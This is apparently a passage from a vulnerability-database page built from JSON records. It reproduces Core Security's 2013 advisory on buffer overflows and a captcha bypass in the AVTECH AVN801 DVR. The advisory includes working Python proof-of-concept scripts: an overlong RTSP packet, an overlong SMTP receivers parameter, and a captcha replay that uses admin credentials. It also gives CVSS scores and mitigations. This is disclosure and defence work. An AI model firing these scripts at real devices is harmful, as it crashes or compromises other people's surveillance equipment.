httplib.HTTPConnection(ip)\nconn.request(\"POST\",\n\"/cgi-bin/user/Config.cgi?action=set\u0026Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nHTTP/1.1\")\nresp = conn.getresponse()\nprint resp.read()\n-----/\n\n\n7.3. As a result, the captcha\nprotection can by completely bypassed. \n\n\n/-----\nimport httplib\n\nip = \"192.168.1.1\"\nprint \"Performing captcha replay with hardcoded wrong captcha code and\nverify code...\"\nconn = httplib.HTTPConnection(ip)\nconn.request(\"GET\",\n\"/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=\u0026captcha_code=FMUA\u0026verify_code=FMUYyLOivRpgc\nHTTP/1.1\")\nresp = conn.getresponse()\nprint \"Reading webpage...\"\nprint resp.read()\nprint \"Performing several captcha replays with hardcoded right captcha\ncode and verify code...\"\nfor i in range(1, 10):\n conn = httplib.HTTPConnection(ip)\n conn.request(\"GET\",\n\"/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=\u0026captcha_code=FMUF\u0026verify_code=FMUYyLOivRpgc\nHTTP/1.1\")\n resp = conn.getresponse()\n print \"Reading webpage...\"\n print resp.read()\n\n-----/\n\n\n8. *Report Timeline*\n\n. 2013-08-06:\nCore Security Technologies attempts to contact vendor using the AVTECH\nofficial technical support contact page [2]. No reply received. 2013-08-12:\nCore attempts to contact vendor. 2013-08-20:\nCore attempts to contact vendor. 2013-08-28:\nAfter 3 attempts to contact vendor, the advisory CORE-2013-0726 is\nreleased as \u0027user release\u0027. \n\n\n9. *References*\n\n[1] http://www.avtech.com.tw. \n[2]\nhttp://www.avtech.com.tw/index.php?option=com_content\u0026view=article\u0026id=244\u0026Itemid=453\u0026lang=en. \n\n\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n11. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2013 Core Security\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/. \n\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4982"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007064"
},
{
"db": "CNVD",
"id": "CNVD-2013-12749"
},
{
"db": "BID",
"id": "62035"
},
{
"db": "PACKETSTORM",
"id": "122998"
}
],
"trust": 2.52
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-4982",
"trust": 3.4
},
{
"db": "BID",
"id": "62035",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007064",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-12749",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201308-458",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "122998",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12749"
},
{
"db": "BID",
"id": "62035"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007064"
},
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "NVD",
"id": "CVE-2013-4982"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-458"
}
]
},
"id": "VAR-201912-1604",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12749"
}
],
"trust": 1.2875
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12749"
}
]
},
"last_update_date": "2023-12-18T12:30:46.842000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.avtech.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007064"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007064"
},
{
"db": "NVD",
"id": "CVE-2013-4982"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities"
},
{
"trust": 2.2,
"url": "http://seclists.org/fulldisclosure/2013/aug/284"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/62035"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4982"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4982"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4981"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.avtech.com.tw/index.php?option=com_content\u0026view=article\u0026id=244\u0026itemid=453\u0026lang=en."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4980"
},
{
"trust": 0.1,
"url": "http://www.avtech.com.tw."
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12749"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007064"
},
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "NVD",
"id": "CVE-2013-4982"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-458"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-12749"
},
{
"db": "BID",
"id": "62035"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-007064"
},
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "NVD",
"id": "CVE-2013-4982"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-458"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12749"
},
{
"date": "2013-08-28T00:00:00",
"db": "BID",
"id": "62035"
},
{
"date": "2020-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007064"
},
{
"date": "2013-08-28T23:44:44",
"db": "PACKETSTORM",
"id": "122998"
},
{
"date": "2019-12-27T17:15:15.857000",
"db": "NVD",
"id": "CVE-2013-4982"
},
{
"date": "2013-08-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-458"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-12749"
},
{
"date": "2014-08-01T00:01:00",
"db": "BID",
"id": "62035"
},
{
"date": "2020-01-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-007064"
},
{
"date": "2020-01-15T14:39:26.487000",
"db": "NVD",
"id": "CVE-2013-4982"
},
{
"date": "2019-12-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201308-458"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "122998"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-458"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "AVTECH AVN801 DVR Vulnerabilities in authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-007064"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201308-458"
}
],
"trust": 0.6
}
}
VAR-201403-0124
Vulnerability from variot - Updated: 2023-12-18 12:30Buffer overflow in cgi-bin/user/Config.cgi in AVTECH AVN801 DVR with firmware 1017-1003-1009-1003 and earlier, and possibly other devices, allows remote attackers to cause a denial of service (device crash) and possibly execute arbitrary code via a long string in the Network.SMTP.Receivers parameter. AVTECH AVN801 is a digital video recorder product. A buffer overflow vulnerability exists in AVTECH AVN801 '/cgi-bin/user/Config.cgi'. No authentication is required. A remote attacker can exploit the vulnerability to execute arbitrary code through a specially crafted HTTP POST request. AVTECH AVN801 is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts may result in a denial-of-service condition. AVTECH AVN801 running firmware version 1017-1003-1009-1003 is vulnerable. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
AVTECH DVR multiple vulnerabilities
- Advisory Information
Title: AVTECH DVR multiple vulnerabilities Advisory ID: CORE-2013-0726 Advisory URL: http://www.coresecurity.com/advisories/avtech-dvr-multiple-vulnerabilities Date published: 2013-08-28 Date of last update: 2013-08-28 Vendors contacted: AVTECH Corporation Release mode: User release
- Vulnerability Information
Class: Buffer overflow [CWE-119], Buffer overflow [CWE-119], Improper Access Control [CWE-284] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4980, CVE-2013-4981, CVE-2013-4982
- Vulnerability Description
Multiple vulnerabilities have been found in AVTECH AVN801 DVR [1] (and potentially other devices sharing the affected firmware) that could allow a remote attacker:
-
[CVE-2013-4982] To bypass the captcha of the administration login console enabling several automated attack vectors.
-
Vulnerable Packages
. DVR 4CH H.264 (AVTECH AVN801) firmware 1017-1003-1009-1003. Older versions are probably affected too, but they were not checked.
- Vendor Information, Solutions and Workarounds
There was no official answer from AVTECH support team after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be:
. Do not expose the DVR to internet unless absolutely necessary. Have at least one proxy filtering the 'SETUP' parameter in RTSP requests. Have at least one proxy filtering the 'Network.SMTP.Receivers' parameter in HTTP requests to '/cgi-bin/user/Config.cgi'.
- Credits
[CVE-2013-4980] was discovered and researched by Anibal Sacco from Core Security Exploit Writers Team. [CVE-2013-4981] and [CVE-2013-4982] were discovered and researched by Facundo Pantaleo from Core Security Consulting Team.
- Technical Description / Proof of Concept Code
7.1. Buffer Overflow in RTSP Packet Handler
[CVE-2013-4980] The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the RTSP transaction; no authentication is required. As a result, the device crashes and it could possibly lead to a remote code execution.
/----- import socket
HOST = '192.168.1.1'
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
trigger_pkt = "SETUP
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2AaLSaLS
RTSP/1.0\r\n"
trigger_pkt += "CSeq: 1\r\n"
trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media
v2010.02.10)\r\n\r\n"
print "[] Sending trigger"
s.sendall(trigger_pkt)
data = s.recv(1024)
print '[] Response:', repr(data), "\r\n"
s.close()
-----/
7.2. As a result, the device crashes and it would possible lead to a remote code execution.
/----- import httplib
ip = "192.168.1.1" conn = httplib.HTTPConnection(ip) conn.request("POST", "/cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1") resp = conn.getresponse() print resp.read() -----/
7.3. CAPTCHA Bypass
[CVE-2013-4982] The following Python proof of concept sends a wrong captcha in first place (just to verify that captcha protection is enabled); then, it sends ten requests with an arbitrary hardcoded captcha and its matching verification code. As a result, the captcha protection can by completely bypassed.
/----- import httplib
ip = "192.168.1.1" print "Performing captcha replay with hardcoded wrong captcha code and verify code..." conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUA&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read() print "Performing several captcha replays with hardcoded right captcha code and verify code..." for i in range(1, 10): conn = httplib.HTTPConnection(ip) conn.request("GET", "/cgi-bin/nobody/VerifyCode.cgi?account=YWRtaW46YWRtaW4=&captcha_code=FMUF&verify_code=FMUYyLOivRpgc HTTP/1.1") resp = conn.getresponse() print "Reading webpage..." print resp.read()
-----/
- Report Timeline
. 2013-08-06: Core Security Technologies attempts to contact vendor using the AVTECH official technical support contact page [2]. No reply received. 2013-08-12: Core attempts to contact vendor. 2013-08-20: Core attempts to contact vendor. 2013-08-28: After 3 attempts to contact vendor, the advisory CORE-2013-0726 is released as 'user release'.
- References
[1] http://www.avtech.com.tw. [2] http://www.avtech.com.tw/index.php?option=com_content&view=article&id=244&Itemid=453&lang=en.
- About CoreLabs
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
- Disclaimer
The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/.
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201403-0124",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "avn801 dvr",
"scope": "eq",
"trust": 1.0,
"vendor": "avtech",
"version": null
},
{
"model": "avn801 dvr",
"scope": "lte",
"trust": 1.0,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
},
{
"model": "avn801",
"scope": "eq",
"trust": 0.9,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
},
{
"model": "avn801",
"scope": null,
"trust": 0.8,
"vendor": "avtech",
"version": null
},
{
"model": "avn801",
"scope": "lte",
"trust": 0.8,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
},
{
"model": "avn801 dvr",
"scope": "eq",
"trust": 0.6,
"vendor": "avtech",
"version": "1017-1003-1009-1003"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12807"
},
{
"db": "BID",
"id": "62037"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006100"
},
{
"db": "NVD",
"id": "CVE-2013-4981"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:avtech:avn801_dvr_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1017-1003-1009-1003",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:avtech:avn801_dvr:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4981"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Facundo Pantaleo of Core Security",
"sources": [
{
"db": "BID",
"id": "62037"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
],
"trust": 0.9
},
"cve": "CVE-2013-4981",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-4981",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-12807",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-64983",
"impactScore": 8.5,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-4981",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2013-12807",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201308-521",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-64983",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-12807"
},
{
"db": "VULHUB",
"id": "VHN-64983"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006100"
},
{
"db": "NVD",
"id": "CVE-2013-4981"
},
{
"db": "CNNVD",
"id": "CNNVD-201308-521"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
